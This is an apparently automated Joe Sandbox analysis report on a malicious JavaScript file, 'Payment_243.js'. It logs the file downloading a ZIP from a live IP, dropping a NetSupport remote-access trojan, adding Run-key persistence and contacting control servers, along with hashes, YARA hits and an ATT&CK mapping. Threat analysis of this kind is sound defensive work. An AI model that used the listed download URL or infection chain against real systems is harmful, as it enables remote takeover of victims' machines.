                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,HttpSendRequestA,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,4_2_1117D104
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,4_2_110934A0
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,4_2_11031780
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_1116EC49
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_69D028E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_69D028E1

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Windows\System32\wscript.exe File created: webmvorbisencoder.dll.0.dr
                                Source: C:\Windows\System32\wscript.exe Network Connect: 45.155.249.215 80
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,4_2_110F4990
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_11113190 GetKeyState,DeviceIoControl,keybd_event,4_2_11113190
                                Source: C:\Windows\System32\wscript.exe Process created: C:\ProgramData\i99ekubc\client32.exe "C:\ProgramData\i99ekubc\client32.exe"
                                Source: C:\ProgramData\i99ekubc\client32.exe File opened: Windows Firewall: C:\Windows\SysWOW64\FirewallAPI.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,4_2_1109E5B0
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,4_2_1109ED30
                                Source: client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: client32.exe, client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr Binary or memory string: Shell_TrayWnd
                                Source: client32.exe, client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr Binary or memory string: Progman
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11174B29
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_11174BCC
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: GetLocaleInfoA,4_2_1116C24E
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_11174796
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_111746A1
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_1117483D
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_11174898
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11174B90
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_11174A69
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,4_2_69D1DB7C
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,4_2_69D0FAE1
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_69D11DB6
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_69D11CC1
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: GetLocaleInfoA,4_2_69D1DC99
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_69D1DC56
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_69D10F39
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_69D11EB8
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_69D11E5D
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_69D121DC
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: EnumSystemLocalesA,4_2_69D12151
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_69D12175
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_69D12089
                                Source: C:\Windows\System32\wscript.exe Queries volume information: C:\ProgramData\i99ekubc.zip VolumeInformation
                                Source: C:\ProgramData\i99ekubc\client32.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,4_2_110F37A0
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_11134830 GetLocalTime,LoadLibraryA,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcessHandleCount,SetLastError,GetProcAddress,GetProcAddress,SetLastError,SetLastError,GetProcAddress,K32GetProcessMemoryInfo,SetLastError,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,4_2_11134830
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_1103BA70 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,4_2_1103BA70
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,4_2_1117594C
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_11146010 _memset,GetVersionExA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDefaultLangID,4_2_11146010
                                Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,4_2_11070430
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_69CEA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,4_2_69CEA980
                                Source: Yara match File source: 4.2.client32.exe.72b40000.5.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 4.2.client32.exe.73620000.6.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 4.2.client32.exe.a10000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 4.0.client32.exe.a10000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 4.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 4.2.client32.exe.69ce0000.3.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 00000004.00000002.644024735.0000000000A12000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara match File source: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara match File source: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara match File source: 00000004.00000002.644043633.0000000001F93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara match File source: 00000004.00000000.506306260.0000000000A12000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara match File source: Process Memory Space: client32.exe PID: 3968, type: MEMORYSTR
                                Source: Yara match File source: C:\ProgramData\i99ekubc\PCICHEK.DLL, type: DROPPED
                                Source: Yara match File source: C:\ProgramData\i99ekubc\pcicapi.dll, type: DROPPED
                                Source: Yara match File source: C:\ProgramData\i99ekubc\client32.exe, type: DROPPED
                                Source: Yara match File source: C:\ProgramData\i99ekubc\TCCTL32.DLL, type: DROPPED
                                Source: Yara match File source: C:\ProgramData\i99ekubc\HTCTL32.DLL, type: DROPPED
                                Source: Yara match File source: C:\ProgramData\i99ekubc\PCICL32.DLL, type: DROPPED
                                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                Gather Victim Identity Information | 22 Scripting | 2 Valid Accounts | 1 Windows Management Instrumentation | 22 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 Input Capture | 12 System Time Discovery | Remote Services | 1 Archive Collected Data | 5 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                                Credentials | Domains | Default Accounts | 4 Native API | 1 DLL Side-Loading | 2 Valid Accounts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 22 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
                                Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 2 Valid Accounts | 21 Access Token Manipulation | 4 Obfuscated Files or Information | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                                Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | 1 Windows Service | 1 Windows Service | 1 Software Packing | NTDS | 35 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 16 Application Layer Protocol | Traffic Duplication | Data Destruction
                                Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Registry Run Keys / Startup Folder | 113 Process Injection | 1 DLL Side-Loading | LSA Secrets | 251 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Registry Run Keys / Startup Folder | 1 File Deletion | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Valid Accounts | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 2 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 21 Access Token Manipulation | Network Sniffing | 1 Remote System Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                                Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 113 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                                Behavior Graph ID: 1591023, Sample: Payment_243.js, Startdate: 14/01/2025, Architecture: WINDOWS, Score: 100
                                Sample signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for dropped file; JavaScript source code contains functionality to generate code involving HTTP requests or file downloads; 3 other signatures
                                wscript.exe (started)
                                  Network: 45.155.249.215, 49163, 80 (MEER-ASmeerfarbigGmbHCoKGDE, Germany)
                                  Dropped: C:\ProgramData\...\webmvorbisencoder.dll, PE32; C:\ProgramData\i99ekubc\webmmux.dll, PE32; C:\ProgramData\i99ekubc\remcmdstub.exe, PE32; 8 other files (6 malicious)
                                  Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                client32.exe (started by wscript.exe)
                                  Network: 185.157.213.71, 443, 49164 (TVHORADADAES, Spain); 172.67.68.212, 49165, 49166, 49167 (CLOUDFLARENETUS, United States); geo.netsupportsoftware.com
                                  Signatures: Multi AV Scanner detection for dropped file; Contains functionalty to change the wallpaper; Delayed program exit found; Contains functionality to detect sleep reduction / modifications

                                Source | Detection | Scanner | Label | Link
                                Payment_243.js | 3% | Virustotal | | Browse
                                Payment_243.js | 3% | ReversingLabs | |

                                Source | Detection | Scanner | Label | Link
                                C:\ProgramData\i99ekubc\HTCTL32.DLL | 16% | ReversingLabs | Win32.Trojan.Generic |
                                C:\ProgramData\i99ekubc\PCICHEK.DLL | 18% | ReversingLabs | Win32.Trojan.Generic |
                                C:\ProgramData\i99ekubc\PCICL32.DLL | 18% | ReversingLabs | Win32.Trojan.NetSupport |
                                C:\ProgramData\i99ekubc\TCCTL32.DLL | 5% | ReversingLabs | |
                                C:\ProgramData\i99ekubc\client32.exe | 32% | ReversingLabs | Win32.Trojan.NetSupport |
                                C:\ProgramData\i99ekubc\install\api-ms-win-core-localization-l1-2-0.dll | 0% | ReversingLabs | |
                                C:\ProgramData\i99ekubc\msvcr100.dll | 0% | ReversingLabs | |
                                C:\ProgramData\i99ekubc\pcicapi.dll | 16% | ReversingLabs | Win32.Trojan.Generic |
                                C:\ProgramData\i99ekubc\remcmdstub.exe | 29% | ReversingLabs | Win32.Trojan.Generic |
                                C:\ProgramData\i99ekubc\webmmux.dll | 0% | ReversingLabs | |
                                C:\ProgramData\i99ekubc\webmvorbisencoder.dll | 0% | ReversingLabs | |
                                No Antivirus matches
                                No Antivirus matches
                                Source | Detection | Scanner | Label | Link
                                http://%s/testpage.htm | 0% | Avira URL Cloud | safe |
                                http://%s/testpage.htmwininet.dll | 0% | Avira URL Cloud | safe |
                                https://jsbench.me/2vkpcekkvw/1) | 0% | Avira URL Cloud | safe |
                                http://www.netsupportsoftware.com | 0% | Avira URL Cloud | safe |
                                http://www.pci.co.uk/supportsupport | 0% | Avira URL Cloud | safe |
                                http://127.0.0.1RESUMEPRINTING | 0% | Avira URL Cloud | safe |
                                http://www.pci.co.uk/support | 0% | Avira URL Cloud | safe |
                                http://45.155.249.215/xxx.zip?mt=6364 | 0% | Avira URL Cloud | safe |
                                http://0.30000000000000004.com/ | 0% | Avira URL Cloud | safe |
                                http://%s/fakeurl.htm | 0% | Avira URL Cloud | safe |
                                http://185.157.213.71/fakeurl.htm | 0% | Avira URL Cloud | safe |
                                https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment). | 0% | Avira URL Cloud | safe |
                                http://www.netsupportschool.com/tutor-assistant.asp11(L | 0% | Avira URL Cloud | safe |
                                http://www.netsupportschool.com/tutor-assistant.asp | 0% | Avira URL Cloud | safe |
                                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                geo.netsupportsoftware.com | 104.26.0.231 | true | false | | high

                                Name | Malicious | Antivirus Detection | Reputation
                                http://geo.netsupportsoftware.com/location/loca.asp | false | | high
                                http://45.155.249.215/xxx.zip?mt=6364 | true | Avira URL Cloud: safe | unknown
                                http://185.157.213.71/fakeurl.htm | false | Avira URL Cloud: safe | unknown
                                Name | Source | Malicious | Antivirus Detection | Reputation
                                https://github.com/apache/incubator-echarts/issues/11369 | Payment_243.js | false | | high
                                http://www.netsupportsoftware.com | client32.exe.0.dr | false | Avira URL Cloud: safe | unknown
                                http://www.apache.org/licenses/LICENSE-2.0 | Payment_243.js | false | | high
                                http://www.pci.co.uk/support | client32.exe, 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr | false | Avira URL Cloud: safe | unknown
                                http://%s/testpage.htmwininet.dll | client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr | false | Avira URL Cloud: safe | unknown
                                http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s) | client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr | false | | high
                                http://www.pci.co.uk/supportsupport | client32.exe, 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr | false | Avira URL Cloud: safe | unknown
                                http://ocsp.thawte.com0 | client32.exe.0.dr | false | | high
                                https://github.com/apache/echarts/issues/14266 | Payment_243.js | false | | high
                                http://127.0.0.1RESUMEPRINTING | client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr | false | Avira URL Cloud: safe | unknown
                                https://jsbench.me/2vkpcekkvw/1) | Payment_243.js | false | Avira URL Cloud: safe | unknown
                                http://%s/testpage.htm | client32.exe, client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr | false | Avira URL Cloud: safe | unknown
                                              http://0.30000000000000004.com/Payment_243.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://127.0.0.1client32.exe, client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                                high
                                                https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.jsPayment_243.jsfalse
                                                  high
                                                  http://www.symauth.com/cps0(HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drfalse
                                                    high
                                                    https://momentjs.com/Payment_243.jsfalse
                                                      high
                                                      https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)Payment_243.jsfalse
                                                        high
                                                        http://%s/fakeurl.htmclient32.exe, client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://github.com/apache/incubator-echarts/issues/12229Payment_243.jsfalse
                                                          high
                                                          http://geo.netsupportsoftware.com/location/loca.aspeclient32.exe, 00000004.00000002.643953111.0000000000441000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.thawte.com/ThawteTimestampingCA.crl0client32.exe.0.drfalse
                                                              high
                                                              https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperationPayment_243.jsfalse
                                                                high
                                                                https://www.thawte.com/cps0/webmvorbisencoder.dll.0.drfalse
                                                                  high
                                                                  http://www.symauth.com/rpa00HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drfalse
                                                                    high
                                                                    https://www.thawte.com/repository0Wwebmvorbisencoder.dll.0.drfalse
                                                                      high
                                                                      http://www.netsupportschool.com/tutor-assistant.asp11(Lclient32.exe, 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://github.com/ecomfe/zrender/blob/master/LICENSE.txtPayment_243.jsfalse
                                                                        high
                                                                        https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).Payment_243.jsfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.netsupportschool.com/tutor-assistant.aspclient32.exe, 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.jsPayment_243.jsfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
45.155.249.215 | unknown | Germany | 34549 | MEER-ASmeerfarbigGmbHCoKGDE | true
172.67.68.212 | unknown | United States | 13335 | CLOUDFLARENETUS | false
185.157.213.71 | unknown | Spain | 50129 | TVHORADADAES | false
                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1591023
                                                                          Start date and time:2025-01-14 16:23:43 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 8m 4s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                          Number of analysed new started processes analysed:7
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • GSI enabled (Javascript)
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:Payment_243.js
                                                                          Detection:MAL
                                                                          Classification:mal100.rans.evad.winJS@3/26@2/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 84%
                                                                          • Number of executed functions: 132
                                                                          • Number of non-executed functions: 261
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .js
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
07:25:32 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run C:\ProgramData\i99ekubc\client32.exe
07:25:40 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run C:\ProgramData\i99ekubc\client32.exe
10:24:41 | API Interceptor | 405x Sleep call for process: wscript.exe modified
10:25:47 | API Interceptor | 76147x Sleep call for process: client32.exe modified
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                            Category:dropped
                                                                                            Size (bytes):2845498
                                                                                            Entropy (8bit):7.997717653428638
                                                                                            Encrypted:true
                                                                                            SSDEEP:49152:b7X1ZldlEDThXBJOhHyx6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqRpykTo:X1wFXa4hRFY89YYc9jh23redpmQRZCP7
                                                                                            MD5:4C1AFE882E6D7C945A8397DCB02A2478
                                                                                            SHA1:85BA754BB1515A1EDC4054A8A3396C238DCE2B7E
                                                                                            SHA-256:67F6FC03CD53FB2A5AB17B97CAAE29B4FD0E0AFB7ADF4C9C64CDB2F7F99D03D4
                                                                                            SHA-512:A1778AE5F89DBBC57AC70C8A8B1CC419DFE015C7F9C9A58AC9957AB3723EDF812A4681CAF167EC63D0EA571448DC01FE01E5B12C5538C98B6BA404CAD2F79B0F
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):328056
                                                                                            Entropy (8bit):6.7547459359511395
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                                            MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                                            SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                                            SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                                            SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\i99ekubc\HTCTL32.DLL, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 16%
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):195
                                                                                            Entropy (8bit):4.924914741174998
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
                                                                                            MD5:E9609072DE9C29DC1963BE208948BA44
                                                                                            SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                                                                                            SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
